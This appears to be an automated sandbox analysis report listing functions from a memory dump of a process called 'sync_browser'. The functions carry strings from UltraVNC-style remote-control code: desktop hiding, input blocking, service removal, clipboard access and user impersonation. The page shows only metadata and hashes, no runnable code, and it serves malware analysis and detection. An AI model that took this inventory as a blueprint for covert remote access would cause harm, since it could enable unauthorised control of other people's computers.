                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Create$Event$Rect$CriticalInitializeSection$AddressLibraryLoadProcTimemalloctime
                                                                      • String ID: BlockInput$USER32$mouseupdate$quit$restart$screenupdate$timer$user1$user2
                                                                      • API String ID: 33112563-1779637096
                                                                      • Opcode ID: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                      • Instruction ID: 2b9b68037691b588d514472f7619a5282d475595603f8f5ab60381ab9b018dcc
                                                                      • Opcode Fuzzy Hash: 12d9c60dc68b12f73036889b8d411b766d5b4a22eba2f64e6bf1725f4b1690ab
                                                                      • Instruction Fuzzy Hash: A4B15A32508BC58AE328EF78F86479AB7A4FB04B04F94453AC7AA42254DF7DF054C725
                                                                      Function 00007FF7E5073770 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 192timewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateObjectTimetime$CapsCompatibleDeleteDevice$BitmapBitsSelect$PixelReleaseSection
                                                                      • String ID: $benchmark.cpp : Blit time %i Getpixeltime %i Use getpixel= %i
                                                                      • API String ID: 2697070071-1399849103
                                                                      • Opcode ID: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                      • Instruction ID: 747c38b7f7c390d72744f267b78fdab71995d4d58a3e2067c63e5578f98872ee
                                                                      • Opcode Fuzzy Hash: c75ecaf3627e65a832fba3c338a4f14dfa2348597fa0c2e187d05a457d19dc9d
                                                                      • Instruction Fuzzy Hash: 2D81853561864A87EB24AF21B824779B395FB88F80F845136D94EC7B68EF3CE414C711
                                                                      Function 00007FF7E5096DD1 Relevance: 40.8, APIs: 15, Strings: 8, Instructions: 552filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$CloseDesktopDriveErrorFileMode$CriticalFirstFolderFromInputLeaveListLocationLogicalMallocNextOpenPathSectionSpecialStringsTypelstrlen
                                                                      • String ID: Desktop$My Documents$Network Favorites$f$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 2965397059-206656798
                                                                      • Opcode ID: 97da4ef10995c7672ad6912daa4e382a39bd3aa79c8f896b0fc3866ca369b3f8
                                                                      • Instruction ID: 24e2727238bf364e437d37a1480a997c66b3188b4d37302e6e679ce19cd1d1ee
                                                                      • Opcode Fuzzy Hash: 97da4ef10995c7672ad6912daa4e382a39bd3aa79c8f896b0fc3866ca369b3f8
                                                                      • Instruction Fuzzy Hash: 47420822A086C685E760AB39C4683FD67A1FB85F94F840237EA1D876D9DF3CD545C322
                                                                      Function 00007FF7E5081100 Relevance: 40.6, APIs: 19, Strings: 4, Instructions: 331filesleeplibraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorFileLast$LibraryProcessSleep$AddressByteCharCloseCreateCurrentDirectoryFreeHandleLoadMultiNamedOpenPipeProcReadSystemWaitWideWritelstrcatsprintf_s
                                                                      • String ID: WinStationQueryInformationW$Winsta0\Winlogon$\\.\Pipe\TerminalServer\SystemExecSrvr\%d$\winsta.dll
                                                                      • API String ID: 2145620463-2328478964
                                                                      • Opcode ID: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                      • Instruction ID: 9e2616f76c3d0017125d865a62cbb8f5e2d0f3beefc67f1cde21f651bb8fb2de
                                                                      • Opcode Fuzzy Hash: 3526ed3cabb8580e2c2a759d620c59a707cfd12fe60383a580afbdfaae7cafc6
                                                                      • Instruction Fuzzy Hash: 2DE1D721A086CA85F720AF74E8547A9B3A1FF44B98F801236ED5D87B98EF3CD545C711
                                                                      Function 00007FF7E5094D7E Relevance: 38.9, APIs: 18, Strings: 4, Instructions: 441COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: System$InfoMetricsParameters$Desktopmouse_event$CloseCursorInputOpen
                                                                      • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                      • API String ID: 246551654-3977938048
                                                                      • Opcode ID: 07ec96cbe0227cada7fdc2a994b7b028b4ee8a196d7ed1bcbf72389d2ff94db8
                                                                      • Instruction ID: f953257388671f4534d8244dbeb53b70500034f08b7c42df8199664dac774a9d
                                                                      • Opcode Fuzzy Hash: 07ec96cbe0227cada7fdc2a994b7b028b4ee8a196d7ed1bcbf72389d2ff94db8
                                                                      • Instruction Fuzzy Hash: 2E22E232A086C586F764AB39D4687FE77A1FB84F58F844036EA4D876A8DF38D444C721
                                                                      Function 00007FF7E5088590 Relevance: 38.8, APIs: 15, Strings: 7, Instructions: 266threadlibraryloaderCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$DisplayLibrarySettingsThread$Free$ChangeEnum$AddressCloseCurrentInputLoadOpenProc
                                                                      • String ID: $DEVICE0$EnumDisplayDevicesA$USER32$\DEVICE$mv video hook driver2$mv2
                                                                      • API String ID: 1729393483-4131161223
                                                                      • Opcode ID: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                      • Instruction ID: a9e75516d06b639373761d6df3142d7796c8e4773b60ab5f2d7a0aaf1145df24
                                                                      • Opcode Fuzzy Hash: 8fb70b05fa99fe765fa15744f32cba980a912edec1c339e6501a40cc58f4b770
                                                                      • Instruction Fuzzy Hash: 69B1C332B0964A86FB20EF34A4607B9B3A0FF44B54F945836EA5D9B688EF3CD505C711
                                                                      Function 00007FF7E5089740 Relevance: 38.7, APIs: 7, Strings: 15, Instructions: 246libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Free$AddressCreateDeleteDisplayEnumLoadProcSettings
                                                                      • String ID: access denied, permission problem$ access ok$ driver Active$1.00.22$DISPLAY$Driver Not Activated, is the viewer current connected ?$Driver not found: Perhaps you need to reboot after install$Driver verion is not 1.00.22 $Driver version OK $EnumDisplayDevicesA$Is winvnc started with run as admin, no permission to start mirror driver? $USER32$driver info: required version 1.00.22$mv video hook driver2$mv2.dll
                                                                      • API String ID: 524771730-2664985301
                                                                      • Opcode ID: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                      • Instruction ID: 5aaae7c3f0ee4820fc72271631d7dab028f90b573b9570f5a87eaa3ef57b4adb
                                                                      • Opcode Fuzzy Hash: 7362158d55f1d2d21951a1544e2162c6409f4db9c5e1fad95bfb36cdb45f3486
                                                                      • Instruction Fuzzy Hash: F2D17435609B4AE5E710EB29B86176973A0FB48B60F904237DA6D837D4DF3CE121C712
                                                                      Function 00007FF7E5082E40 Relevance: 36.8, APIs: 14, Strings: 7, Instructions: 95serviceCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • OpenSCManagerA.ADVAPI32 ref: 00007FF7E5082E5D
                                                                      • OpenServiceA.ADVAPI32 ref: 00007FF7E5082EAD
                                                                      • GetLastError.KERNEL32 ref: 00007FF7E5082EBB
                                                                      • CloseServiceHandle.ADVAPI32 ref: 00007FF7E5082EE0
                                                                        • Part of subcall function 00007FF7E507A040: OpenInputDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A07A
                                                                        • Part of subcall function 00007FF7E507A040: GetCurrentThreadId.KERNEL32 ref: 00007FF7E507A083
                                                                        • Part of subcall function 00007FF7E507A040: GetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A08B
                                                                        • Part of subcall function 00007FF7E507A040: SetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0A6
                                                                        • Part of subcall function 00007FF7E507A040: MessageBoxA.USER32 ref: 00007FF7E507A0B7
                                                                        • Part of subcall function 00007FF7E507A040: SetThreadDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0C2
                                                                        • Part of subcall function 00007FF7E507A040: CloseDesktop.USER32(?,?,?,00007FF7E50782D7), ref: 00007FF7E507A0CB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Desktop$Thread$Open$CloseService$CurrentErrorHandleInputLastManagerMessage
                                                                      • String ID: Failed to delete the service$Failed to open service control manager$Failed to open the service$Failed to query service status$Failed: Permission denied$UltraVNC$uvnc_service
                                                                      • API String ID: 1921882253-4018834470
                                                                      • Opcode ID: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                      • Instruction ID: eefa9b40e005ce99ac59b43b1904b2389d9f2d202bc56a768ea4e86d4406b82d
                                                                      • Opcode Fuzzy Hash: 89c88f06f4114718cce365b56f1f704feee2962acf5f53bddd364f3665430f83
                                                                      • Instruction Fuzzy Hash: 64411321A0864F81EA24BB25B835779A361FF49F54FC41037E90EC6259EF3CE545C722
                                                                      Function 00007FF7E5071AE0 Relevance: 36.2, APIs: 24, Instructions: 196clipboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
                                                                      • String ID:
                                                                      • API String ID: 1939172783-0
                                                                      • Opcode ID: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
                                                                      • Instruction ID: 0aff9de7bf33255f11aae7901925f02ff6fbfbf58aa39169b19ea90b7d2e5bb4
                                                                      • Opcode Fuzzy Hash: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
                                                                      • Instruction Fuzzy Hash: 06815335A09B4A86E664BF22B92037AB3A0FF44F81B845135DE5D87795EF3CE424C712
                                                                      Function 00007FF7E507A910 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF7E507AA26
                                                                      • HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF7E507AAC1
                                                                      • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF7E507A94D
                                                                      • HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF7E507AB1D
                                                                      • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF7E507A9BB
                                                                      • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF7E507A97B
                                                                      • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF7E507A9E6
                                                                      • HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF7E507AA4D
                                                                      • HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF7E507AAE1
                                                                      • HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF7E507AB3F
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorInfoLastParametersSystem
                                                                      • String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
                                                                      • API String ID: 2777246624-1480653996
                                                                      • Opcode ID: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                      • Instruction ID: dc78872f71e1b3ae1cdd0c02643a961fd228a6000c1b9fa5ef9d1a6e3a8acc16
                                                                      • Opcode Fuzzy Hash: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                      • Instruction Fuzzy Hash: 3C511561E0858F95F720BB68B930BB5A7A1AF94B44FC45033E40DC25A9EE3CA519C373
                                                                      Function 00007FF7E509C2C0 Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF7E509C3A7
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF7E509C2F4
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF7E509C43D
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF7E509C3DC
                                                                      • g, xrefs: 00007FF7E509C31B
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF7E509C37E
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF7E509C455
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
